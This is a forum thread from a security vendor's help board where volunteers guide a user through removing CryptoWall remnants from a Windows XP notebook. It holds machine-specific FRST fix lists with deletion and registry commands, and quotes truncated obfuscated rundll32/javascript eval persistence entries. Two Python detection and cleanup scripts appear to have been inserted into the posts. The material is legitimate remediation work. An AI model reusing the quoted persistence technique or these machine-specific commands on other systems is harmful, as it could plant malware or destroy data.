Author Topic: CryptoWall and URL:Mal!


REDACTED

  • Guest
CryptoWall and URL:Mal!
« on: October 05, 2015, 12:16:15 PM »
Hi all! First time posting on these forums, although I have been an avast user for many years. I just wanted to say I love the product and I always recommend it over any other AV tool out there. So, here's what brings me to the forums today.

A coworker of mine handed me his daughter's notebook and asked me to get it running right again, but I'm completely stumped with this one. Normally I can run my tools and get everything back to 100%. Originally it was just running insanely slow (picture being on a Win95 machine right now), taking about 2 minutes between clicks for things to fully load. I finally managed to get avast installed and got rid of the useless ConstantGuard that was already installed.

After running Malwarebytes and cleaning a ton of junk off of it, and then getting avast to inform me that CryptoWall had polluted this thing (hundreds upon hundreds of HELP_ENCRYPT.* files), I thought I was finally in the clear. Follow-up scans by both programs revealed nothing, but it was still running slow. Now I'm getting a loop of approximately 51 URLs being blocked by avast, all stating URL:Mal. However, the scans still say nothing. It is also forcing a CHKDSK upon bootup/restart EVERY time; not sure why. I even checked the Task Scheduler and found nothing. I'm still seeing the hundreds upon hundreds of HELP_ENCRYPT.* files in every single relevant system folder as well (although evidently not infected).

Hopefully these logs will shed some light on my issue. Thanks for the help in advance. It is very much appreciated!

Offline Michael (alan1998)

  • Massive Poster
  • ****
  • Posts: 2768
  • Volunteer
Re: CryptoWall and URL:Mal!
« Reply #1 on: October 05, 2015, 12:24:50 PM »
I already know the answer to this:

(Microsoft Corporation) C:\32788R22FWJFW\cmd.3XE
() C:\32788R22FWJFW\pev.3XE

Find and upload them to www.virustotal.com. I think someone faked an M$ signature there...

Remover notified.

 :o :o
2015-10-04 14:53 - 2015-10-04 15:11 - 00000000 ___SD C:\ComboFix
2015-10-04 14:52 - 2015-10-04 14:53 - 00000000 ____D C:\Qoobox

Although it's a good tool, please do not use it without some serious supervision. If you've ALREADY run it, attach the log. If you have not, do not attach it. CF should be used by only specialists.
« Last Edit: October 05, 2015, 12:27:21 PM by Michael (alan1998) »
VOLUNTEER

Senior Security Analyst; Sys Admin (Linux); Forensics/Incident Response.

Security is a mindset, not an application. Think BEFORE you click.

Offline essexboy

  • Malware removal instructor
  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 40589
  • Dragons by Sasha
    • Malware fixes
Re: CryptoWall and URL:Mal!
« Reply #2 on: October 05, 2015, 04:34:37 PM »
Hi, this may well need several runs to clean.

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open Notepad and copy/paste the text in the quote box below into it:
 
Quote
CreateRestorePoint:
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ibch5\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Ridm (the data entry has 361 more characters). <==== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ibch5\..\mshtml,RunHTMLApplication ";eval(")odv!@buhwdYNckdbu)#VRbshqu/Ridm (the data entry has 27831 more characters). <==== ATTENTION
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <==== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
Toolbar: HKU\S-1-5-21-460486182-2704883870-4021508746-1006 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
2015-10-04 15:19 - 2015-10-04 15:25 - 00000000 ___SD C:\32788R22FWJFW
2015-10-01 17:25 - 2015-04-03 15:41 - 00000000 ____D C:\Documents and Settings\Emmie\Local Settings\Application Data\tomyqq
2015-10-01 17:25 - 2015-02-04 21:58 - 00000000 ____D C:\Documents and Settings\Emmie\Local Settings\Application Data\44b5baf2-c6d8-4e22-aebc-e18685531fea
2015-10-01 17:25 - 2014-09-23 18:42 - 00000000 ____D C:\Program Files\MalwareProtection360
2015-10-01 17:25 - 2009-08-01 00:34 - 00000000 __SHD C:\Documents and Settings\Emmie\Local Settings\Application Data\{26752934-2fdf-5111-52c9-ab697a4499a3}
2015-10-01 17:24 - 2015-03-31 14:23 - 00000000 ____D C:\Documents and Settings\Emmie\Local Settings\Application Data\ukek
2015-10-01 17:24 - 2015-03-30 14:52 - 00000000 ___HD C:\Documents and Settings\All Users\Application Data\{D59601A0-67DF-4A0D-9F82-36BB7D0B27A7}
C:\Windows\Installer\{26752934-2fdf-5111-52c9-ab697a4499a3}
2015-10-02 18:15 - 2010-11-22 19:04 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\{429CAD59-35B1-4DBC-BB6D-1DB246563521}
2015-10-02 18:15 - 2010-01-04 19:31 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\{755AC846-7372-4AC8-8550-C52491DAA8BD}
2015-10-02 18:14 - 2015-01-10 21:48 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\B0FFCDD9-5261-4e59-B29A-17A4FABDEBAB
2015-10-02 18:09 - 2014-09-23 20:49 - 00000000 ____D C:\Documents and Settings\All Users\Application Data\188F1432-103A-4ffb-80F1-36B633C5C9E1
CMD: del /F /Q /S "C:\HELP_DECRYPT.HTML"
CMD: del /F /Q /S "C:\HELP_DECRYPT.PNG"
CMD: del /F /Q /S "C:\HELP_DECRYPT.URL"
CMD: del /F /Q /S "C:\HELP_DECRYPT.TXT"
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe.

Run FRST and press Fix.
On completion a log will be generated; please post that.

THEN

Scan with IDTool
 
Please download IDTool by Nathan and save the file to the desktop.
It will come as a zipped file, so you will need to unzip it. You may do so by right-clicking on it and choosing Extract All. Extract it to your desktop.
  • Enter the IDTool directory, right-click on the icon and select Run as Administrator to start the tool.
  • IDTool needs the Microsoft .NET Framework to work properly, so if prompted to download and install it, please agree.
  • Wait patiently until the tool has collected the necessary data.
  • Once the main console is loaded, please press Rescan Computer and Generate a New Report.
  • When the main bar reports that the rescan is completed, press Generate Text Friendly Report for Forums.
  • Copy the entire content of the frame that appears. You may want to save it to a text file for your convenience.
Please include those contents in your next reply.
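The two LocalServer32 entries marked ATTENTION in the fix above are worth recognising on sight: a COM server registered as `rundll32.exe javascript:"...mshtml,RunHTMLApplication"` with an `eval(...)` body is the fileless persistence trick made familiar by Poweliks, and a payload that lives only in the registry is consistent with file scans reporting nothing while avast kept blocking URLs. As an added example, not FRST and not the forum's own tooling, here is a small Python triage script that reads FRST-style log lines and flags that pattern together with the other entries in the fix (System Restore disabled by policy, the InvalidSubkeyName key, orphaned BHO/Winlogon entries). The sample lines are constructed to resemble the posted log with the long payloads shortened, and the rules and severities are my own assumptions.

```python
"""Triage FRST-style log lines for the indicators seen in this thread.

Added illustration only: this is not FRST, and the sample log is a
constructed imitation of the posted one with payloads shortened to "...".
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample (not a real log), modelled on the quoted fix list.
SAMPLE_LOG = r"""
Winlogon\Notify\SDWinLogon: SDWinLogon.dll [X]
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"ibch5\..\mshtml,RunHTMLApplication ";eval("...") <==== ATTENTION
HKLM\...99B7938DA9E4}\LocalServer32: [a] rundll32.exe javascript:"ibch5\..\mshtml,RunHTMLApplication ";eval("...") <==== ATTENTION
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <==== ATTENTION
HKLM\Software\Policies\Microsoft\Windows NT\SystemRestore: [DisableSR/DisableConfig]  <===== ATTENTION
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
HKLM\...\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
"""


@dataclass(frozen=True)
class Finding:
    severity: str  # "high", "medium" or "low" (assumed scale)
    rule: str
    line: str


# (severity, rule name, pattern).  Severities are this example's assumptions.
RULES = [
    # A COM LocalServer32 that launches rundll32 with a javascript: URL:
    # the fileless persistence pattern.  Normal COM activation of the CLSID
    # runs the script, so no file on disk carries the payload.
    ("high", "fileless-com-localserver32",
     re.compile(r"LocalServer32:.*rundll32\.exe\s+javascript:", re.I)),
    # RunHTMLApplication driving an eval() body: an obfuscated script stage.
    ("high", "runhtmlapplication-eval",
     re.compile(r"RunHTMLApplication.*eval\(", re.I)),
    # System Restore disabled by policy; ransomware does this so restore
    # points cannot be used to get files back.
    ("medium", "system-restore-disabled",
     re.compile(r"SystemRestore:\s*\[DisableSR", re.I)),
    # A subkey name regedit cannot display, a common key-hiding trick.
    ("medium", "invalid-subkey-name",
     re.compile(r"^InvalidSubkeyName:", re.I)),
    # Entries whose target file is gone: leftovers, low priority.
    ("low", "orphaned-entry",
     re.compile(r"->\s+No File$|\[X\]$")),
]

GUID_RE = re.compile(
    r"\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}")


def triage(log_text):
    """Return one Finding per (line, matching rule), in log order."""
    findings = []
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        for severity, rule, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(severity, rule, line))
    return findings


def summarize(findings):
    """Count of findings per severity, e.g. {"high": 4, ...}."""
    return dict(Counter(f.severity for f in findings))


def clsids_in(log_text):
    """Full CLSIDs mentioned in the log, deduplicated, first-seen order.
    Truncated keys like 'HKLM\\...99B7938DA9E4}' are deliberately ignored."""
    return list(dict.fromkeys(GUID_RE.findall(log_text)))


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.rule:28} {f.line[:90]}")
    print("CLSIDs to inspect:", clsids_in(SAMPLE_LOG))
```

The point of separating `triage` from `clsids_in` is that the registry path FRST prints for the hijacked LocalServer32 is truncated, so the only usable handle on the key is the CLSID that appears in the InvalidSubkeyName line; that is the key a fix has to target.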

REDACTED

  • Guest
Re: CryptoWall and URL:Mal!
« Reply #3 on: October 05, 2015, 11:33:38 PM »
Ok, so here is what both of those turned up. Looks like there's still some remnants of CryptoWall and other things.

Offline essexboy

Re: CryptoWall and URL:Mal!
« Reply #4 on: October 06, 2015, 03:57:57 PM »
Let's clear the flag now; meanwhile, how is the computer behaving?

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open Notepad and copy/paste the text in the quote box below into it:
 
Quote
CreateRestorePoint:
Reg: Reg Delete "HKCU\Software\D026A52F1C42ED6E1D7970FC81C7DDBF" /F
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers

 
Save this as fixlist.txt, in the same location as FRST.exe.

Run FRST and press Fix.
On completion a log will be generated; please post that.

REDACTED

  • Guest
Re: CryptoWall and URL:Mal!
« Reply #5 on: October 06, 2015, 10:20:53 PM »
Things seem to be running much better. FRST crashed when I tried to run it, but generated a log nonetheless. Bitsadmin isn't installed on this PC for whatever reason, and I can't get the tools to install from MS either.  Here is the log as you requested.

Offline essexboy

Re: CryptoWall and URL:Mal!
« Reply #6 on: October 06, 2015, 10:50:36 PM »
Bitsadmin is not available in XP; I should have removed that command... Oops.

I believe all the HELP_DECRYPT files should now be gone...  Any outstanding problems ?
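The four `del /F /Q /S "C:\HELP_DECRYPT.*"` lines in the first fix are what removed the notes. The notes themselves are inert HTML/PNG/URL/TXT files, which is why repeated scans reported nothing while hundreds of them remained; but because the ransomware drops one set into every folder it encrypts, their locations are a map of exactly which folders were hit. As an added example, not the thread's own tooling and not a substitute for FRST, here is a Python script that inventories HELP_DECRYPT.* notes under a root, lists the folders that received one, and optionally deletes them with a dry-run default. The note names are those used in the fix list; the directory tree it runs on is constructed in a temporary directory.

```python
"""Inventory, map and optionally delete CryptoWall ransom notes.

Added illustration only.  NOTE_NAMES are the four names from the fix list
in this thread; the sample tree is constructed in a temp directory.
"""
import os
import tempfile

NOTE_NAMES = {"HELP_DECRYPT.HTML", "HELP_DECRYPT.PNG",
              "HELP_DECRYPT.URL", "HELP_DECRYPT.TXT"}


def find_notes(root):
    """Paths of ransom notes under root (case-insensitive name match)."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.upper() in NOTE_NAMES:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def affected_folders(note_paths):
    """Folders that received a note: the encryption footprint.  Use this
    before deleting anything, since it is the only cheap record of scope."""
    return sorted({os.path.dirname(p) for p in note_paths})


def remove_notes(root, dry_run=True):
    """Delete the notes (the equivalent of del /F /Q /S).

    Returns (handled, failed).  With dry_run=True nothing is deleted and
    'handled' is simply the list that would be removed.
    """
    handled, failed = [], []
    for path in find_notes(root):
        if dry_run:
            handled.append(path)
            continue
        try:
            os.chmod(path, 0o666)  # clear read-only first, as del /F does
            os.remove(path)
            handled.append(path)
        except OSError:
            failed.append(path)
    return handled, failed


def build_sample_tree():
    """Constructed sample: three folders 'encrypted' with notes, one clean."""
    root = tempfile.mkdtemp(prefix="cw_sample_")
    layout = {
        "Documents": ["report.docx", "HELP_DECRYPT.HTML", "HELP_DECRYPT.PNG",
                      "HELP_DECRYPT.TXT", "HELP_DECRYPT.URL"],
        "Documents/Photos": ["img1.jpg", "help_decrypt.html",
                             "help_decrypt.txt"],
        "Desktop": ["HELP_DECRYPT.TXT", "HELP_DECRYPT.HTML"],
        "Program Files/App": ["app.exe"],
    }
    for rel, files in layout.items():
        folder = os.path.join(root, rel)
        os.makedirs(folder, exist_ok=True)
        for name in files:
            with open(os.path.join(folder, name), "w") as fh:
                fh.write("sample content\n")
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    notes = find_notes(sample_root)
    print(f"{len(notes)} notes in {len(affected_folders(notes))} folders:")
    for folder in affected_folders(notes):
        print("  ", os.path.relpath(folder, sample_root))
    handled, failed = remove_notes(sample_root, dry_run=False)
    print(f"deleted {len(handled)}, failed {len(failed)}, "
          f"remaining {len(find_notes(sample_root))}")
```

Keep the `affected_folders` output with the case notes: once the notes are gone, nothing else on the machine tells you which directories the ransomware touched, and that list is what decides whether a folder's files are worth keeping from a backup or are already lost.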

REDACTED

  • Guest
Re: CryptoWall and URL:Mal!
« Reply #7 on: October 07, 2015, 01:07:51 AM »
None that I can see. Some failures on Windows Updates but that's not necessarily a big issue. About to upgrade to 7 then 10 on this machine. Just wanted to clean it up so I didn't corrupt a fresh install.

Offline Michael (alan1998)

Re: CryptoWall and URL:Mal!
« Reply #8 on: October 07, 2015, 01:20:56 AM »
Impossible....

When you upgrade to 7, you're wiping all windows files. I don't know how many times I've reinstalled in an old, corrupted Windows inside a VM, or my actual Machine....

The update to 7 to 10 can be an issue though, assuming you use GWX (Get Windows 10).

REDACTED

  • Guest
Re: CryptoWall and URL:Mal!
« Reply #9 on: October 07, 2015, 02:26:04 AM »
You're right, but I always try to make sure I have a clean slate before doing an install (unless it's a pre-format). With CryptoWall, I had no idea what was and wasn't affected.

Offline essexboy

Re: CryptoWall and URL:Mal!
« Reply #10 on: October 07, 2015, 04:45:07 PM »
Subject to no further problems   :)

I will remove my tools now and give some recommendations, but I would like you to run for 24 hours or so and come back if you have any problems.

Now the best part of the day ----- Your log now appears clean  :thumbsup:

A good workman always cleans up after himself, so the following will implement some cleanup procedures as well as reset System Restore points:

Remove Combofix

Click Start, then Run.
On Windows 7 or Vista you may use the Start Search field if Run is not available.
In the box copy/paste the following command:

ComboFix /Uninstall

Note that there is a space between "ComboFix" and "/Uninstall".

Then click OK (or press Enter).
Wait for the uninstall process to complete.

Remove tools

Download and run Delfix
Select the options as shown



Keep Java Updated:

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article

I would recommend that you completely uninstall Java unless you need it to run important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to disable Java in your web browser and How to unplug Java from the browser.)

If you do need to keep Java then download JavaRa
Run the programme and select  Remove Java Runtime.  Uninstall all versions of Java present
Once done then run it again and select Update Java runtime > Download and install Latest version



Now that you are clean, to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent: install this programme to lock down and prevent crypto ransomware.



Malwarebytes

Update and run weekly to keep your system clean

Unchecky

Click on the link above to be taken to Unchecky.com.
Click the very large Download button.
Click Save.
Click Open folder.
Right-click on Unchecky_setup and choose Run as Administrator.
Once open, click the Install button.
Then click Finish.
Unchecky is now installed and will help you keep unwanted check boxes unchecked; this is a fire-and-forget programme  ;)

It is critical to have both a firewall and antivirus to protect your system, and to keep them updated.

To learn more about how to protect yourself while on the internet, read this little guide: Best security practices. Keep safe  :wave:

REDACTED

  • Guest
Re: CryptoWall and URL:Mal!
« Reply #11 on: October 08, 2015, 11:24:45 PM »
Thank you so much for all of your help! I'm sure you don't get that enough.

Offline essexboy

Re: CryptoWall and URL:Mal!
« Reply #12 on: October 09, 2015, 02:27:25 PM »
:)